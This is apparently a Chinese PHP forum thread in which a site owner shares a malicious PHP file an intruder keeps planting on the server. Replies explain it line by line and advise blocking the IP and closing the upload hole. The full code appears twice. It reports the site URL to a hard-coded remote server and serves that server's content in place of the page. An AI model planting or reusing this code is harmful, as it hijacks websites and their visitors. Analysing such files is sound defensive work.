Home >Backend Development >PHP Tutorial >PHP代码 请高手帮忙看下什么意思

PHP代码 请高手帮忙看下什么意思

WBOY
WBOYOriginal
2016-06-20 12:29:281838browse

我网站好像被黑了,总有个SB天天来我网站根目录放一个文件,打开后代码如下:
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://122.114.126.160/"; 
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT']; 
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name);
echo $Content_mb;
exit(); 
function getHTTPPage($url) {
$opts = array(
  'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
  )
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;

?>

这什么意图?求高手分析下


回复讨论(解决方案)

他把这个代码放到你根目录下,网站是不是访问不了?

好像是他把你网站 原始地址   传到他自己写的一个方法里面 用 host 参数接受   然后抓取你首页的信息吧 

我网站没异常(我还没发现异常)

好像是他把你网站 原始地址   传到他自己写的一个方法里面 用 host 参数接受   然后抓取你首页的信息吧 



我网站没异常(我还没发现异常)

上面我的描述有问题,这个文件不是放在更目录,是放在根目录的上一个目录,如图:

public_html 这个目录里面是网站的根目录,他这个文件和public_html放在同一个目录,不知道他这样对我的网站有什么影响。 这SB隔天来次,已经删了几次了。
linux系统,目前权限设置为755,设置为644网站就打不开了,有什么办法不让他上次文件吗?

$Remote_server."/index.html?host=".$host_name  这个地方他把你的网站地址传过去 不知道干什么了 ,代码在那个ip的服务器上面 看不到。。。。。猜不来他要干什么。。。。。

服务器 那方面的我不懂,等高手来把,


谢谢你

没有异常?
set_time_limit(0); //永不超时
header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集
$Remote_server = "http://122.114.126.160/"; //远程网站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站
echo $Content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function getHTTPPage($url) { //调用远程网站函数
$opts = array(
  'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
  )
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;


至于对方做了什么?目前尚不清楚
如果是在本地开发环境,返回的是广告,正常的页面没有了
如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(CSRF攻击)
仅是出一点广告,倒是也无所谓

不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。

把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。

没有异常?
set_time_limit(0); //永不超时
header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集
$Remote_server = "http://122.114.126.160/"; //远程网站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站
echo $Content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function getHTTPPage($url) { //调用远程网站函数
$opts = array(
  'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
  )
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;


至于对方做了什么?目前尚不清楚
如果是在本地开发环境,返回的是广告,正常的页面没有了
如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(CSRF攻击)
仅是出一点广告,倒是也无所谓


-------------------------
感谢

不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。


-------------------------
感谢

把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。



-------------------------
感谢

我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹

我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹



谢谢  有可能
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn